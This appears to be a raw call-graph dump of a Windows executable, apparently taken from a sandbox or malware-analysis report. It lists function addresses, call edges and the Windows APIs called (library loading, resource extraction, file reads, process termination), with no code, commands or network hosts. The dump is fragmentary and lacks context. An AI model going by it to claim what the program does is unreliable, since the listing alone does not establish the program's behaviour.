109313->109323 109314 410ea5 TranslateMessage DispatchMessageW 109314->109313 109315 444d50 TranslateAcceleratorW 109315->109313 109315->109323 109316 44581f WaitForSingleObject 109316->109323 109324 44583c GetExitCodeProcess CloseHandle 109316->109324 109318 420db6 59 API calls Mailbox 109318->109323 109319 410d13 timeGetTime 109319->109323 109320 410e5f Sleep 109330 410e70 Mailbox 109320->109330 109321 408047 59 API calls 109321->109323 109323->109296 109323->109302 109323->109307 109323->109312 109323->109313 109323->109314 109323->109315 109323->109316 109323->109318 109323->109319 109323->109320 109323->109321 109325 410f95 109323->109325 109326 445af8 Sleep 109323->109326 109328 40b73c 314 API calls 109323->109328 109323->109330 109332 410f4e timeGetTime 109323->109332 109353 40fce0 314 API calls 109323->109353 109356 469e4a 89 API calls 109323->109356 109358 4089b3 69 API calls 109323->109358 109359 409c90 59 API calls Mailbox 109323->109359 109360 409ea0 314 API calls 109323->109360 109361 4084c0 69 API calls 109323->109361 109363 45617e 59 API calls Mailbox 109323->109363 109364 4455d5 VariantClear 109323->109364 109365 44566b VariantClear 109323->109365 109366 408cd4 59 API calls Mailbox 109323->109366 109367 445419 VariantClear 109323->109367 109368 456e8f 59 API calls 109323->109368 109369 407de1 59 API calls 109323->109369 109432 40e420 109323->109432 109439 40e6a0 109323->109439 109470 40f460 109323->109470 109490 4031ce IsDialogMessageW GetClassLongW 109323->109490 109497 486018 59 API calls 109323->109497 109498 469a15 59 API calls Mailbox 109323->109498 109499 45d4f2 59 API calls 109323->109499 109500 409837 109323->109500 109518 4560ef 59 API calls 2 library calls 109323->109518 109519 408401 59 API calls 109323->109519 109520 4082df 59 API calls Mailbox 109323->109520 109324->109325 109325->109205 109326->109330 109328->109323 109330->109323 109330->109325 109331 42049f timeGetTime 109330->109331 109335 445b8f GetExitCodeProcess 109330->109335 109337 40b7dd 109 API calls 109330->109337 109342 485f25 110 API calls 109330->109342 109343 445874 109330->109343 109344 445078 Sleep 109330->109344 109345 445c17 Sleep 109330->109345 109521 407667 109330->109521 109526 462408 60 API calls 109330->109526 109527 409e5d 60 API calls 109330->109527 109528 407de1 109330->109528 109532 4089b3 69 API calls Mailbox 109330->109532 109533 40b73c 341 API calls 109330->109533 109534 4564da 60 API calls 109330->109534 109535 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109330->109535 109536 463c55 66 API calls Mailbox 109330->109536 109331->109330 109493 409e5d 60 API calls 109332->109493 109338 445ba5 WaitForSingleObject 109335->109338 109339 445bbb CloseHandle 109335->109339 109337->109330 109338->109323 109338->109339 109339->109330 109342->109330 109343->109325 109344->109323 109345->109323 109353->109323 109356->109323 109358->109323 109359->109323 109360->109323 109361->109323 109363->109323 109364->109323 109365->109323 109366->109323 109367->109323 109368->109323 109369->109323 109370->109228 109371->109232 109372->109226 109373->109226 109375 409ebf 109374->109375 109394 409eed Mailbox 109374->109394 109377 420db6 Mailbox 59 API calls 109375->109377 109376 422d40 67 API calls __cinit 109376->109394 109377->109394 109378 40b475 109379 408047 59 API calls 109378->109379 109392 40a057 109379->109392 109380 40b47a 109381 440055 109380->109381 109396 4409e5 109380->109396 110917 469e4a 89 API calls 4 library calls 109381->110917 109382 407667 59 API calls 109382->109394 109384 420db6 59 API calls Mailbox 109384->109394 109387 408047 59 API calls 109387->109394 109388 440064 109388->109162 109391 456e8f 59 API calls 109391->109394 109392->109162 109393 4409d6 110919 469e4a 89 API calls 4 library calls 109393->110919 109394->109376 109394->109378 109394->109380 109394->109381 109394->109382 109394->109384 109394->109387 109394->109391 109394->109392 109394->109393 109397 40a55a 109394->109397 110915 40c8c0 341 API calls 2 library calls 109394->110915 110916 40b900 60 API calls Mailbox 109394->110916 110920 469e4a 89 API calls 4 library calls 109396->110920 110918 469e4a 89 API calls 4 library calls 109397->110918 109398->109232 109399->109158 109400->109174 109401->109185 109402->109174 109403->109174 109404->109173 109405->109181 109406->109182 109407->109182 109408->109184 109409->109188 109410->109226 109411->109226 109412->109226 109413->109226 109415 4084cb 109414->109415 109417 4084f2 109415->109417 110921 4089b3 69 API calls Mailbox 109415->110921 109417->109210 109418->109174 109419->109212 109421 408052 109420->109421 109422 40805a 109420->109422 109423 407f77 59 API calls 109421->109423 109422->109220 109423->109422 109424->109165 109425->109174 109427 407e62 109426->109427 109429 407e5f _memmove 109426->109429 109428 420db6 Mailbox 59 API calls 109427->109428 109428->109429 109429->109280 109430->109284 109431->109290 109433 40e451 109432->109433 109434 40e43d 109432->109434 109538 469e4a 89 API calls 4 library calls 109433->109538 109537 40df00 341 API calls 2 library calls 109434->109537 109437 40e448 109437->109323 109438 443aa4 109438->109438 109440 40e6d5 109439->109440 109441 443aa9 109440->109441 109444 40e73f 109440->109444 109454 40e799 109440->109454 109442 409ea0 341 API calls 109441->109442 109443 443abe 109442->109443 109469 40e970 Mailbox 109443->109469 109543 469e4a 89 API calls 4 library calls 109443->109543 109447 407667 59 API calls 109444->109447 109444->109454 109445 407667 59 API calls 109445->109454 109448 443b04 109447->109448 109544 422d40 109448->109544 109449 422d40 __cinit 67 API calls 109449->109454 109450 443b26 109450->109323 109452 4084c0 69 API calls 109452->109469 109453 409ea0 341 API calls 109453->109469 109454->109445 109454->109449 109454->109450 109455 40e95a 109454->109455 109454->109469 109455->109469 109547 469e4a 89 API calls 4 library calls 109455->109547 109460 408d40 59 API calls 109460->109469 109462 469e4a 89 API calls 109462->109469 109466 443e25 109466->109323 109467 40f195 109551 469e4a 89 API calls 4 library calls 109467->109551 109468 40ea78 109468->109323 109469->109452 109469->109453 109469->109460 109469->109462 109469->109467 109469->109468 109539 407f77 109469->109539 109548 456e8f 59 API calls 109469->109548 109549 47c5c3 341 API calls 109469->109549 109550 47b53c 341 API calls Mailbox 109469->109550 109552 409c90 59 API calls Mailbox 109469->109552 109553 4793c6 341 API calls Mailbox 109469->109553 109471 40f650 109470->109471 109472 40f4ba 109470->109472 109475 407de1 59 API calls 109471->109475 109473 40f4c6 109472->109473 109474 44441e 109472->109474 109733 40f290 341 API calls 2 library calls 109473->109733 109735 47bc6b 109474->109735 109481 40f58c Mailbox 109475->109481 109478 44442c 109482 40f630 109478->109482 109775 469e4a 89 API calls 4 library calls 109478->109775 109480 40f4fd 109480->109478 109480->109481 109480->109482 109484 40f5e3 109481->109484 109632 47445a 109481->109632 109641 46cb7a 109481->109641 109721 47df37 109481->109721 109724 404e4a 109481->109724 109730 463c37 109481->109730 109482->109323 109484->109482 109734 409c90 59 API calls Mailbox 109484->109734 109490->109323 109491->109299 109492->109305 109493->109323 109494->109306 109495->109306 109496->109306 109497->109323 109498->109323 109499->109323 109501 409851 109500->109501 109510 40984b 109500->109510 109502 409857 __itow 109501->109502 109503 409899 109501->109503 109504 43f5d3 __i64tow 109501->109504 109509 43f4da 109501->109509 109506 420db6 Mailbox 59 API calls 109502->109506 110913 423698 83 API calls 3 library calls 109503->110913 109504->109504 109508 409871 109506->109508 109508->109510 109512 407de1 59 API calls 109508->109512 109511 420db6 Mailbox 59 API calls 109509->109511 109516 43f552 Mailbox _wcscpy 109509->109516 109510->109323 109513 43f51f 109511->109513 109512->109510 109514 420db6 Mailbox 59 API calls 109513->109514 109515 43f545 109514->109515 109515->109516 109517 407de1 59 API calls 109515->109517 110914 423698 83 API calls 3 library calls 109516->110914 109517->109516 109518->109323 109519->109323 109520->109323 109522 420db6 Mailbox 59 API calls 109521->109522 109523 407688 109522->109523 109524 420db6 Mailbox 59 API calls 109523->109524 109525 407696 109524->109525 109525->109330 109526->109330 109527->109330 109529 407df0 __NMSG_WRITE _memmove 109528->109529 109530 420db6 Mailbox 59 API calls 109529->109530 109531 407e2e 109530->109531 109531->109330 109532->109330 109533->109330 109534->109330 109535->109330 109536->109330 109537->109437 109538->109438 109540 407f9a _memmove 109539->109540 109541 407f87 109539->109541 109540->109469 109541->109540 109542 420db6 Mailbox 59 API calls 109541->109542 109542->109540 109543->109469 109554 422c44 109544->109554 109546 422d4b 109546->109454 109547->109469 109548->109469 109549->109469 109550->109469 109551->109466 109552->109469 109553->109469 109555 422c50 _raise 109554->109555 109562 423217 109555->109562 109561 422c77 _raise 109561->109546 109579 429c0b 109562->109579 109564 422c59 109565 422c88 DecodePointer DecodePointer 109564->109565 109566 422c65 109565->109566 109567 422cb5 109565->109567 109576 422c82 109566->109576 109567->109566 109625 4287a4 59 API calls _raise 109567->109625 109569 422d18 EncodePointer EncodePointer 109569->109566 109570 422cec 109570->109566 109574 422d06 EncodePointer 109570->109574 109627 428864 61 API calls 2 library calls 109570->109627 109571 422cc7 109571->109569 109571->109570 109626 428864 61 API calls 2 library calls 109571->109626 109574->109569 109575 422d00 109575->109566 109575->109574 109628 423220 109576->109628 109580 429c2f EnterCriticalSection 109579->109580 109581 429c1c 109579->109581 109580->109564 109586 429c93 109581->109586 109583 429c22 109583->109580 109610 4230b5 58 API calls 3 library calls 109583->109610 109587 429c9f _raise 109586->109587 109588 429cc0 109587->109588 109589 429ca8 109587->109589 109594 429ce1 _raise 109588->109594 109614 42881d 58 API calls 2 library calls 109588->109614 109611 42a16b 58 API calls 2 library calls 109589->109611 109591 429cad 109612 42a1c8 58 API calls 7 library calls 109591->109612 109593 429cd5 109596 429ceb 109593->109596 109597 429cdc 109593->109597 109594->109583 109600 429c0b __lock 58 API calls 109596->109600 109615 428b28 58 API calls __getptd_noexit 109597->109615 109598 429cb4 109613 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109598->109613 109602 429cf2 109600->109602 109604 429d17 109602->109604 109605 429cff 109602->109605 109617 422d55 109604->109617 109616 429e2b InitializeCriticalSectionAndSpinCount 109605->109616 109608 429d0b 109623 429d33 LeaveCriticalSection _doexit 109608->109623 109611->109591 109612->109598 109614->109593 109615->109594 109616->109608 109618 422d5e RtlFreeHeap 109617->109618 109622 422d87 _free 109617->109622 109619 422d73 109618->109619 109618->109622 109624 428b28 58 API calls __getptd_noexit 109619->109624 109621 422d79 GetLastError 109621->109622 109622->109608 109623->109594 109624->109621 109625->109571 109626->109570 109627->109575 109631 429d75 LeaveCriticalSection 109628->109631 109630 422c87 109630->109561 109631->109630 109633 409837 84 API calls 109632->109633 109634 474494 109633->109634 109776 406240 109634->109776 109636 4744a4 109637 4744c9 109636->109637 109638 409ea0 341 API calls 109636->109638 109640 4744cd 109637->109640 109801 409a98 109637->109801 109638->109637 109640->109484 109642 407667 59 API calls 109641->109642 109643 46cbaf 109642->109643 109644 407667 59 API calls 109643->109644 109645 46cbb8 109644->109645 109646 46cbcc 109645->109646 110050 409b3c 109645->110050 109648 409837 84 API calls 109646->109648 109649 46cbe9 109648->109649 109650 46ccea 109649->109650 109651 46cc0b 109649->109651 109656 46cd1a Mailbox 109649->109656 109854 404ddd 109650->109854 109652 409837 84 API calls 109651->109652 109654 46cc17 109652->109654 109657 408047 59 API calls 109654->109657 109656->109484 109660 46cc23 109657->109660 109658 46cd16 109658->109656 109659 407667 59 API calls 109658->109659 109662 46cd4b 109659->109662 109665 46cc37 109660->109665 109666 46cc69 109660->109666 109661 404ddd 136 API calls 109661->109658 109663 407667 59 API calls 109662->109663 109664 46cd54 109663->109664 109668 407667 59 API calls 109664->109668 109669 408047 59 API calls 109665->109669 109667 409837 84 API calls 109666->109667 109670 46cc76 109667->109670 109671 46cd5d 109668->109671 109672 46cc47 109669->109672 109674 408047 59 API calls 109670->109674 109675 407667 59 API calls 109671->109675 110054 407cab 109672->110054 109677 46cc82 109674->109677 109678 46cd66 109675->109678 110061 464a31 GetFileAttributesW 109677->110061 109681 409837 84 API calls 109678->109681 109679 409837 84 API calls 109682 46cc5d 109679->109682 109684 46cd73 109681->109684 109685 407b2e 59 API calls 109682->109685 109683 46cc8b 109686 46cc9e 109683->109686 109689 4079f2 59 API calls 109683->109689 109878 40459b 109684->109878 109685->109666 109688 409837 84 API calls 109686->109688 109696 46cca4 109686->109696 109692 46cccb 109688->109692 109689->109686 110062 4637ef 75 API calls Mailbox 109692->110062 109696->109656 110790 47cadd 109721->110790 109723 47df47 109723->109484 109725 404e54 109724->109725 109727 404e5b 109724->109727 109726 4253a6 __fcloseall 83 API calls 109725->109726 109726->109727 109728 404e6a 109727->109728 109729 404e7b FreeLibrary 109727->109729 109728->109484 109729->109728 110901 46445a GetFileAttributesW 109730->110901 109733->109480 109734->109484 109736 47bc96 109735->109736 109737 47bcb0 109735->109737 110905 469e4a 89 API calls 4 library calls 109736->110905 110906 47a213 59 API calls Mailbox 109737->110906 109740 47bcbb 109741 409ea0 340 API calls 109740->109741 109742 47bd1c 109741->109742 109743 47bdae 109742->109743 109747 47bd5d 109742->109747 109768 47bca8 Mailbox 109742->109768 109744 47be04 109743->109744 109745 47bdb4 109743->109745 109746 409837 84 API calls 109744->109746 109744->109768 110908 46791a 59 API calls 109745->110908 109748 47be16 109746->109748 110907 4672df 59 API calls Mailbox 109747->110907 109750 407e4f 59 API calls 109748->109750 109753 47be3a CharUpperBuffW 109750->109753 109751 47bdd7 110909 405d41 59 API calls Mailbox 109751->110909 109758 47be54 109753->109758 109755 47bd8d 109757 40f460 340 API calls 109755->109757 109756 47bddf Mailbox 109762 40fce0 340 API calls 109756->109762 109757->109768 109759 47bea7 109758->109759 109760 47be5b 109758->109760 109761 409837 84 API calls 109759->109761 110910 4672df 59 API calls Mailbox 109760->110910 109763 47beaf 109761->109763 109762->109768 110911 409e5d 60 API calls 109763->110911 109766 47be89 109767 40f460 340 API calls 109766->109767 109767->109768 109768->109478 109769 47beb9 109769->109768 109770 409837 84 API calls 109769->109770 109771 47bed4 109770->109771 110912 405d41 59 API calls Mailbox 109771->110912 109773 47bee4 109774 40fce0 340 API calls 109773->109774 109774->109768 109775->109482 109814 407a16 109776->109814 109778 40646a 109821 40750f 109778->109821 109780 406484 Mailbox 109780->109636 109783 43dff6 109834 45f8aa 91 API calls 4 library calls 109783->109834 109784 407d8c 59 API calls 109795 406265 109784->109795 109785 40750f 59 API calls 109785->109795 109789 43e004 109790 40750f 59 API calls 109789->109790 109791 43e01a 109790->109791 109791->109780 109792 406799 _memmove 109835 45f8aa 91 API calls 4 library calls 109792->109835 109793 43df92 109831 408029 109793->109831 109795->109778 109795->109783 109795->109784 109795->109785 109795->109792 109795->109793 109798 407e4f 59 API calls 109795->109798 109819 405f6c 60 API calls 109795->109819 109820 405d41 59 API calls Mailbox 109795->109820 109829 405e72 60 API calls 109795->109829 109830 407924 59 API calls 2 library calls 109795->109830 109796 43df9d 109800 420db6 Mailbox 59 API calls 109796->109800 109799 40643b CharUpperBuffW 109798->109799 109799->109795 109800->109792 109802 43f7d6 109801->109802 109803 409aa8 109801->109803 109806 43f7e7 109802->109806 109836 407bcc 109802->109836 109808 420db6 Mailbox 59 API calls 109803->109808 109845 407d8c 109806->109845 109807 43f7f1 109811 409ad4 109807->109811 109812 407667 59 API calls 109807->109812 109809 409abb 109808->109809 109809->109807 109810 409ac6 109809->109810 109810->109811 109813 407de1 59 API calls 109810->109813 109811->109640 109812->109811 109813->109811 109815 420db6 Mailbox 59 API calls 109814->109815 109816 407a3b 109815->109816 109817 408029 59 API calls 109816->109817 109818 407a4a 109817->109818 109818->109795 109819->109795 109820->109795 109822 4075af 109821->109822 109828 407522 _memmove 109821->109828 109824 420db6 Mailbox 59 API calls 109822->109824 109823 420db6 Mailbox 59 API calls 109825 407529 109823->109825 109824->109828 109826 420db6 Mailbox 59 API calls 109825->109826 109827 407552 109825->109827 109826->109827 109827->109780 109828->109823 109829->109795 109830->109795 109832 420db6 Mailbox 59 API calls 109831->109832 109833 408033 109832->109833 109833->109796 109834->109789 109835->109780 109837 407c45 109836->109837 109838 407bd8 __NMSG_WRITE 109836->109838 109850 407d2c 109837->109850 109840 407c13 109838->109840 109841 407bee 109838->109841 109843 408029 59 API calls 109840->109843 109849 407f27 59 API calls Mailbox 109841->109849 109844 407bf6 _memmove 109843->109844 109844->109806 109846 407da6 109845->109846 109847 407d99 109845->109847 109848 420db6 Mailbox 59 API calls 109846->109848 109847->109807 109848->109847 109849->109844 109851 407d43 _memmove 109850->109851 109852 407d3a 109850->109852 109851->109844 109852->109851 109853 407e4f 59 API calls 109852->109853 109853->109851 110063 404bb5 109854->110063 109859 43d8e6 109862 404e4a 84 API calls 109859->109862 109860 404e08 LoadLibraryExW 110073 404b6a 109860->110073 109864 43d8ed 109862->109864 109866 404b6a 3 API calls 109864->109866 109868 43d8f5 109866->109868 109867 404e2f 109867->109868 109869 404e3b 109867->109869 110099 404f0b 109868->110099 109870 404e4a 84 API calls 109869->109870 109872 404e40 109870->109872 109872->109658 109872->109661 109875 43d91c 110107 404ec7 109875->110107 109879 407667 59 API calls 109878->109879 109880 4045b1 109879->109880 109881 407667 59 API calls 109880->109881 109882 4045b9 109881->109882 109883 407667 59 API calls 109882->109883 109884 4045c1 109883->109884 109885 407667 59 API calls 109884->109885 109886 4045c9 109885->109886 109887 43d4d2 109886->109887 109888 4045fd 109886->109888 109889 408047 59 API calls 109887->109889 109890 40784b 59 API calls 109888->109890 109891 43d4db 109889->109891 109892 40460b 109890->109892 109893 407d8c 59 API calls 109891->109893 109894 407d2c 59 API calls 109892->109894 109896 404640 109893->109896 109895 404615 109894->109895 109895->109896 109897 40784b 59 API calls 109895->109897 109898 404680 109896->109898 109900 40465f 109896->109900 109911 43d4fb 109896->109911 109901 404636 109897->109901 110394 40784b 109898->110394 109905 4079f2 59 API calls 109900->109905 109903 43d5cb 109911->109903 109913 43d5b4 109911->109913 109926 43d532 109911->109926 109913->109903 110051 409b52 110050->110051 110052 409b4d 110050->110052 110051->109646 110052->110051 110784 42358a 59 API calls 110052->110784 110055 43ed4a 110054->110055 110056 407cbf 110054->110056 110057 408029 59 API calls 110055->110057 110785 407c50 110056->110785 110060 43ed55 __NMSG_WRITE _memmove 110057->110060 110059 407cca 110059->109679 110061->109683 110062->109696 110112 404c03 110063->110112 110066 404bdc 110067 404bf5 110066->110067 110068 404bec FreeLibrary 110066->110068 110070 42525b 110067->110070 110068->110067 110069 404c03 2 API calls 110069->110066 110116 425270 110070->110116 110072 404dfc 110072->109859 110072->109860 110197 404c36 110073->110197 110076 404ba1 FreeLibrary 110077 404baa 110076->110077 110080 404c70 110077->110080 110078 404c36 2 API calls 110079 404b8f 110078->110079 110079->110076 110079->110077 110081 420db6 Mailbox 59 API calls 110080->110081 110082 404c85 110081->110082 110201 40522e 110082->110201 110084 404c91 _memmove 110085 404ccc 110084->110085 110086 404dc1 110084->110086 110087 404d89 110084->110087 110088 404ec7 69 API calls 110085->110088 110215 46991b 95 API calls 110086->110215 110204 404e89 CreateStreamOnHGlobal 110087->110204 110096 404cd5 110088->110096 110091 404f0b 74 API calls 110091->110096 110092 404d69 110092->109867 110094 43d8a7 110095 404ee5 85 API calls 110094->110095 110097 43d8bb 110095->110097 110096->110091 110096->110092 110096->110094 110210 404ee5 110096->110210 110098 404f0b 74 API calls 110097->110098 110098->110092 110100 404f1d 110099->110100 110101 43d9cd 110099->110101 110239 4255e2 110100->110239 110104 469109 110371 468f5f 110104->110371 110106 46911f 110106->109875 110108 43d990 110107->110108 110109 404ed6 110107->110109 110376 425c60 110109->110376 110111 404ede 110113 404bd0 110112->110113 110114 404c0c LoadLibraryA 110112->110114 110113->110066 110113->110069 110114->110113 110115 404c1d GetProcAddress 110114->110115 110115->110113 110117 42527c _raise 110116->110117 110118 42528f 110117->110118 110121 4252c0 110117->110121 110165 428b28 58 API calls __getptd_noexit 110118->110165 110120 425294 110166 428db6 9 API calls _raise 110120->110166 110135 4304e8 110121->110135 110124 4252c5 110125 4252db 110124->110125 110126 4252ce 110124->110126 110128 425305 110125->110128 110129 4252e5 110125->110129 110167 428b28 58 API calls __getptd_noexit 110126->110167 110150 430607 110128->110150 110168 428b28 58 API calls __getptd_noexit 110129->110168 110130 42529f _raise @_EH4_CallFilterFunc@8 110130->110072 110136 4304f4 _raise 110135->110136 110137 429c0b __lock 58 API calls 110136->110137 110147 430502 110137->110147 110138 430576 110170 4305fe 110138->110170 110139 43057d 110175 42881d 58 API calls 2 library calls 110139->110175 110142 4305f3 _raise 110142->110124 110143 430584 110143->110138 110176 429e2b InitializeCriticalSectionAndSpinCount 110143->110176 110144 429c93 __mtinitlocknum 58 API calls 110144->110147 110147->110138 110147->110139 110147->110144 110173 426c50 59 API calls __lock 110147->110173 110174 426cba LeaveCriticalSection LeaveCriticalSection _doexit 110147->110174 110148 4305aa EnterCriticalSection 110148->110138 110159 430627 __wopenfile 110150->110159 110151 430641 110181 428b28 58 API calls __getptd_noexit 110151->110181 110152 4307fc 110152->110151 110157 43085f 110152->110157 110154 430646 110182 428db6 9 API calls _raise 110154->110182 110156 425310 110169 425332 LeaveCriticalSection LeaveCriticalSection __wfsopen 110156->110169 110178 4385a1 110157->110178 110159->110151 110159->110152 110183 4237cb 60 API calls 2 library calls 110159->110183 110161 4307f5 110161->110152 110184 4237cb 60 API calls 2 library calls 110161->110184 110163 430814 110163->110152 110185 4237cb 60 API calls 2 library calls 110163->110185 110165->110120 110166->110130 110167->110130 110168->110130 110169->110130 110177 429d75 LeaveCriticalSection 110170->110177 110172 430605 110172->110142 110173->110147 110174->110147 110175->110143 110176->110148 110177->110172 110186 437d85 110178->110186 110180 4385ba 110180->110156 110181->110154 110182->110156 110183->110161 110184->110163 110185->110152 110187 437d91 _raise 110186->110187 110188 437da7 110187->110188 110190 437ddd 110187->110190 110189 428b28 _raise 58 API calls 110188->110189 110191 437dac 110189->110191 110192 437e4e __wsopen_nolock 109 API calls 110190->110192 110193 428db6 _raise 9 API calls 110191->110193 110194 437df9 110192->110194 110196 437db6 _raise 110193->110196 110195 437e22 __wsopen_helper LeaveCriticalSection 110194->110195 110195->110196 110196->110180 110198 404b83 110197->110198 110199 404c3f LoadLibraryA 110197->110199 110198->110078 110198->110079 110199->110198 110200 404c50 GetProcAddress 110199->110200 110200->110198 110202 420db6 Mailbox 59 API calls 110201->110202 110203 405240 110202->110203 110203->110084 110205 404ea3 FindResourceExW 110204->110205 110207 404ec0 110204->110207 110206 43d933 LoadResource 110205->110206 110205->110207 110206->110207 110208 43d948 SizeofResource 110206->110208 110207->110085 110208->110207 110209 43d95c LockResource 110208->110209 110209->110207 110211 404ef4 110210->110211 110212 43d9ab 110210->110212 110216 42584d 110211->110216 110214 404f02 110214->110096 110215->110085 110219 425859 _raise 110216->110219 110217 42586b 110229 428b28 58 API calls __getptd_noexit 110217->110229 110218 425891 110231 426c11 110218->110231 110219->110217 110219->110218 110222 425870 110230 428db6 9 API calls _raise 110222->110230 110226 4258a6 110238 4258c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 110226->110238 110228 42587b _raise 110228->110214 110229->110222 110230->110228 110232 426c43 EnterCriticalSection 110231->110232 110233 426c21 110231->110233 110235 425897 110232->110235 110233->110232 110234 426c29 110233->110234 110236 429c0b __lock 58 API calls 110234->110236 110237 4257be 83 API calls 5 library calls 110235->110237 110236->110235 110237->110226 110238->110228 110242 4255fd 110239->110242 110241 404f2e 110241->110104 110244 425609 _raise 110242->110244 110243 425644 _raise 110243->110241 110244->110243 110245 42561f _memset 110244->110245 110246 42564c 110244->110246 110269 428b28 58 API calls __getptd_noexit 110245->110269 110247 426c11 __lock_file 59 API calls 110246->110247 110249 425652 110247->110249 110255 42541d 110249->110255 110250 425639 110270 428db6 9 API calls _raise 110250->110270 110259 425438 _memset 110255->110259 110262 425453 110255->110262 110256 425443 110367 428b28 58 API calls __getptd_noexit 110256->110367 110258 425448 110368 428db6 9 API calls _raise 110258->110368 110259->110256 110259->110262 110267 425493 110259->110267 110271 425686 LeaveCriticalSection LeaveCriticalSection __wfsopen 110262->110271 110263 4255a4 _memset 110370 428b28 58 API calls __getptd_noexit 110263->110370 110267->110262 110267->110263 110272 4246e6 110267->110272 110279 430e5b 110267->110279 110347 430ba7 110267->110347 110369 430cc8 58 API calls 3 library calls 110267->110369 110269->110250 110270->110243 110271->110243 110273 4246f0 110272->110273 110274 424705 110272->110274 110275 428b28 _raise 58 API calls 110273->110275 110274->110267 110276 4246f5 110275->110276 110277 428db6 _raise 9 API calls 110276->110277 110278 424700 110277->110278 110278->110267 110280 430e93 110279->110280 110281 430e7c 110279->110281 110283 4315cb 110280->110283 110288 430ecd 110280->110288 110282 428af4 __wsopen_nolock 58 API calls 110281->110282 110285 430e81 110282->110285 110284 428af4 __wsopen_nolock 58 API calls 110283->110284 110286 4315d0 110284->110286 110287 428b28 _raise 58 API calls 110285->110287 110289 428b28 _raise 58 API calls 110286->110289 110328 430e88 110287->110328 110290 430ed5 110288->110290 110296 430eec 110288->110296 110291 430ee1 110289->110291 110292 428af4 __wsopen_nolock 58 API calls 110290->110292 110294 428db6 _raise 9 API calls 110291->110294 110293 430eda 110292->110293 110297 428b28 _raise 58 API calls 110293->110297 110294->110328 110295 430f01 110298 428af4 __wsopen_nolock 58 API calls 110295->110298 110296->110295 110299 430f1b 110296->110299 110300 430f39 110296->110300 110296->110328 110297->110291 110298->110293 110299->110295 110304 430f26 110299->110304 110301 42881d __malloc_crt 58 API calls 110300->110301 110302 430f49 110301->110302 110305 430f51 110302->110305 110306 430f6c 110302->110306 110303 435c6b __flsbuf 58 API calls 110307 43103a 110303->110307 110304->110303 110308 428b28 _raise 58 API calls 110305->110308 110310 4318c1 __lseeki64_nolock 60 API calls 110306->110310 110309 4310b3 ReadFile 110307->110309 110314 431050 GetConsoleMode 110307->110314 110311 430f56 110308->110311 110312 431593 GetLastError 110309->110312 110313 4310d5 110309->110313 110310->110304 110315 428af4 __wsopen_nolock 58 API calls 110311->110315 110316 4315a0 110312->110316 110317 431093 110312->110317 110313->110312 110321 4310a5 110313->110321 110318 4310b0 110314->110318 110319 431064 110314->110319 110315->110328 110320 428b28 _raise 58 API calls 110316->110320 110325 428b07 __dosmaperr 58 API calls 110317->110325 110331 431099 110317->110331 110318->110309 110319->110318 110322 43106a ReadConsoleW 110319->110322 110323 4315a5 110320->110323 110327 43110a 110321->110327 110330 431377 110321->110330 110321->110331 110322->110321 110324 43108d GetLastError 110322->110324 110326 428af4 __wsopen_nolock 58 API calls 110323->110326 110324->110317 110325->110331 110326->110331 110333 431176 ReadFile 110327->110333 110338 4311f7 110327->110338 110328->110267 110329 422d55 _free 58 API calls 110329->110328 110330->110331 110334 43147d ReadFile 110330->110334 110331->110328 110331->110329 110335 431197 GetLastError 110333->110335 110345 4311a1 110333->110345 110340 4314a0 GetLastError 110334->110340 110346 4314ae 110334->110346 110335->110345 110336 4312b4 110341 431264 MultiByteToWideChar 110336->110341 110342 4318c1 __lseeki64_nolock 60 API calls 110336->110342 110337 4312a4 110339 428b28 _raise 58 API calls 110337->110339 110338->110331 110338->110336 110338->110337 110338->110341 110339->110331 110340->110346 110341->110324 110341->110331 110342->110341 110343 4318c1 __lseeki64_nolock 60 API calls 110343->110345 110344 4318c1 __lseeki64_nolock 60 API calls 110344->110346 110345->110327 110345->110343 110346->110330 110346->110344 110348 430bb2 110347->110348 110352 430bc7 110347->110352 110349 428b28 _raise 58 API calls 110348->110349 110350 430bb7 110349->110350 110351 428db6 _raise 9 API calls 110350->110351 110361 430bc2 110351->110361 110353 435fe4 __getbuf 58 API calls 110352->110353 110354 430bfc 110352->110354 110352->110361 110353->110354 110355 4246e6 __fputwc_nolock 58 API calls 110354->110355 110356 430c10 110355->110356 110357 430d47 __read 72 API calls 110356->110357 110358 430c17 110357->110358 110359 4246e6 __fputwc_nolock 58 API calls 110358->110359 110358->110361 110360 430c3a 110359->110360 110360->110361 110362 4246e6 __fputwc_nolock 58 API calls 110360->110362 110361->110267 110363 430c46 110362->110363 110363->110361 110364 4246e6 __fputwc_nolock 58 API calls 110363->110364 110365 430c53 110364->110365 110366 4246e6 __fputwc_nolock 58 API calls 110365->110366 110366->110361 110367->110258 110368->110262 110369->110267 110370->110258 110374 42520a GetSystemTimeAsFileTime 110371->110374 110373 468f6e 110373->110106 110375 425238 __aulldiv 110374->110375 110375->110373 110377 425c6c _raise 110376->110377 110378 425c93 110377->110378 110379 425c7e 110377->110379 110380 426c11 __lock_file 59 API calls 110378->110380 110390 428b28 58 API calls __getptd_noexit 110379->110390 110382 425c99 110380->110382 110392 4258d0 67 API calls 6 library calls 110382->110392 110383 425c83 110391 428db6 9 API calls _raise 110383->110391 110386 425ca4 110393 425cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 110386->110393 110388 425cb6 110389 425c8e _raise 110388->110389 110389->110111 110390->110383 110391->110389 110392->110386 110393->110388 110784->110051 110786 407c5f __NMSG_WRITE 110785->110786 110787 408029 59 API calls 110786->110787 110788 407c70 _memmove 110786->110788 110789 43ed07 _memmove 110787->110789 110788->110059 110791 409837 84 API calls 110790->110791 110792 47cb1a 110791->110792 110793 47cb61 Mailbox 110792->110793 110828 47d7a5 110792->110828 110793->109723 110795 47cf2e 110878 47d8c8 92 API calls Mailbox 110795->110878 110797 47cdc7 110841 47c96e 110797->110841 110799 47cf3d 110799->110797 110800 47cf49 110799->110800 110800->110793 110801 409837 84 API calls 110816 47cbb2 Mailbox 110801->110816 110806 47ce00 110856 420c08 110806->110856 110809 47ce33 110863 4092ce 110809->110863 110810 47ce1a 110862 469e4a 89 API calls 4 library calls 110810->110862 110813 47ce25 GetCurrentProcess TerminateProcess 110813->110809 110814 47cdb9 110814->110795 110814->110797 110816->110793 110816->110801 110816->110814 110860 47fbce 59 API calls 2 library calls 110816->110860 110861 47cfdf 61 API calls 2 library calls 110816->110861 110819 47cfa4 110819->110793 110823 47cfb8 FreeLibrary 110819->110823 110821 47ce6b 110875 47d649 107 API calls _free 110821->110875 110823->110793 110827 47ce7c 110827->110819 110876 408d40 59 API calls Mailbox 110827->110876 110877 409d3c 60 API calls Mailbox 